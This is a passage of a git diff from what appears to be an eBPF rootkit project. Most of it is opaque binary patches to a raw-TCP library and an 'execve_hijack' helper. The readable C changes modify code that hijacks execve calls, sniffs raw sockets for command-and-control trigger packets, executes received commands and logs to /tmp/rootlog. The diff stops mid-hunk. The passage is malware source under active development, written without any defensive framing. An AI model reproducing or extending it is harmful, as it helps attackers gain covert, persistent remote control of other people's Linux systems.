zM6*UG7$tENund7N9$YepHtY)Z6K@FMNM}WCY}KxW@E5gm)?b{0mO8V3I}9GXA4+l`
zDMv*)qbi+IN1Zjr<wD5kP8{3v%I;~Jn~8FoxI0)5#v$U8>f>$oyH|O$lyI7JAi=ZJ
NIY``vHxBG|`#0wrsILG3

diff --git a/src/client/lib/libRawTCP_Lib.a b/src/client/lib/libRawTCP_Lib.a
index a7c465a8af5e9e0a591e3774dd214a4bf3759308..828fcec523d432e1308ba849125c8f748aaac1f6 100644
GIT binary patch
delta 459
zcmew}nfcFT<_#illHIOLdMg+`x_wu8bcZ&0bh~!=bh`?8bROHR>E_Nfxx`}+<F?I)
zo(owRKWx72Tf-<XozBL<z%(&Im;neFxkOBW6w|~w2$x%QbDsYMMy72nlLghpHj4#n
zG8!my++bzrSj);;x|=nA0jr1&t4b*=>t~?Ye6Sen0#*qQphy#kEvrNtE9>O^pfJYM
zn~wzru?l@)1e)&3C(y>^%**D{%*=d$vsOeD6DL?4D7Aj_K{N5mOQJFu4^QTe)@M|j
zY#S}k*u6P4`Z+UW(PZ0ramI$pe<j5k7f#NN7nj<_1k?irEI=#)#DD%nz%{1HeX(Lp
zkAPHy_~gWXaY+MakUEG;NgxeV=>w8wieR4nE>?{3-elbbamL4!5B7^Q{+=8QWD8FY
zoFL9Pdvk9>I~!y7WYKhYpp#;O<l)Ur)8m;X4?~Sz0yZ2Na6lS_l_tw(i!*hzY+iR*
o4;*^;j+jlJljFej4IGe@KiFv?m;#d<>{%usI4Zh1Hg|pu0N1#Tr2qf`

delta 460
zcmew}nfcFT<_#ilq8{D8D?GYG8$7y8JGxz$_;kApbROTV>*mfhd4Y%0<Vha$7&mP;
z^jyfo_-6BE-x@}F`E)i02BwJ#!VEyb$R%L{q?jhgLAczKoAdl9FfwgonJlO#wplDt
zlhHtx;|41?$68k2(%r1d3s@y=ST#ynIX?r%=7YsJ7qH5307aTOY*}T}SUD%>2Zb?C
z-h3=5h*jtfBhYkLK7lqSXI?gsW@hHwo3$dMm^i`WK&kbU51NTjUJ{kTxPLNlv_7NU
zWZP(Q#`evj(a)I~^CsKIi!;_t{wpcYICpYxytvdhCZHZ5U;$zYApY|o0xmI4?u!*;
zy2mv6U91=*)8xc{aY-F!kV=SJNgxeV>j9Ew3SkB-y){`kL7ega<b(a<jNd260@?hN
z11E?xPT$;{(9Xu#K3O!~9q6c7Ai00@()4&{$^B4cmw*ii1|5(FVY$h&+2Ty?ESuLI
r)@Nj7nSAev+2lDn4osiGAvyVjod$v_FuB2=W%7ZeqMKuL=f?m5!HkSv

diff --git a/src/ebpf/include/bpf/exec.h b/src/ebpf/include/bpf/exec.h
index 17c0470..dd2c210 100644
--- a/src/ebpf/include/bpf/exec.h
+++ b/src/ebpf/include/bpf/exec.h
@@ -198,6 +198,8 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
         bpf_printk("Error reading 1\n");
     };
 
+    //hijacker_state = 1;
+
     bpf_printk("SUCCESS NEW FILENAME: %s\n", newfilename);
     bpf_printk("NEW ARGV0: %s\n\n", newargv[0]);
     bpf_printk("NEW ARGV1: %s\n", newargv[1]);
diff --git a/src/helpers/execve_hijack b/src/helpers/execve_hijack
index 1633e22b464f7ab164ca4c5754057a476ef29417..86a35ff8b31f7edfceaf8c262c31a9050b10ddb1 100755
GIT binary patch
delta 8901
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

delta 8427
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

diff --git a/src/helpers/execve_hijack.c b/src/helpers/execve_hijack.c
index 55cc968..b585a72 100644
--- a/src/helpers/execve_hijack.c
+++ b/src/helpers/execve_hijack.c
@@ -15,6 +15,8 @@
 #include <netdb.h>
 #include <netinet/ip.h>
 #include <netinet/tcp.h>
+#include <sys/file.h>
+#include <errno.h>
 
 #include "lib/RawTCP.h"
 #include "../common/c&c.h"
@@ -22,6 +24,8 @@
 #include <bpf/bpf.h>
 #include <bpf/libbpf.h>
 
+#define LOCK_FILE "/tmp/rootlog"
+
 char* getLocalIpAddress(){
     char hostbuffer[256];
     char* IPbuffer = calloc(256, sizeof(char));
@@ -65,13 +69,8 @@ char* execute_command(char* command){
     return res;
 }
 
-int hijacker_process_routine(int argc, char* argv[]){
-    int fd = open("/tmp/rootlog", O_RDWR | O_CREAT | O_TRUNC, 0666);
-    if(fd<0){
-        perror("Failed to open log file");
-        //return -1;
-    }
-
+int hijacker_process_routine(int argc, char* argv[], int fd){
+    //Lock the file to indicate we are already into the routine
     time_t rawtime;
     struct tm * timeinfo;
 
@@ -98,7 +97,7 @@ int hijacker_process_routine(int argc, char* argv[]){
     write(fd, "\n", 1);
     write(fd, "Sniffing...\n", 13);
     
-
+    printf("Running hijacking process\n");
     packet_t packet = rawsocket_sniff_pattern(CC_PROT_SYN);
     if(packet.ipheader == NULL){
         write(fd, "Failed to open rawsocket\n", 1);
@@ -149,6 +148,7 @@ int hijacker_process_routine(int argc, char* argv[]){
         }
     }
 
+    flock(fd, LOCK_UN);
     close(fd);
     return 0;
 }
@@ -177,6 +177,7 @@ int main(int argc, char* argv[], char *envp[]){
             perror("Failed to execve()");
             exit(-1);
         }
+        exit(0);
     }
 
 
@@ -190,8 +191,23 @@ int main(int argc, char* argv[], char *envp[]){
     if (pid == 0) {
         //Child process
         printf("I am the child with pid %d\n", (int) getpid());
+
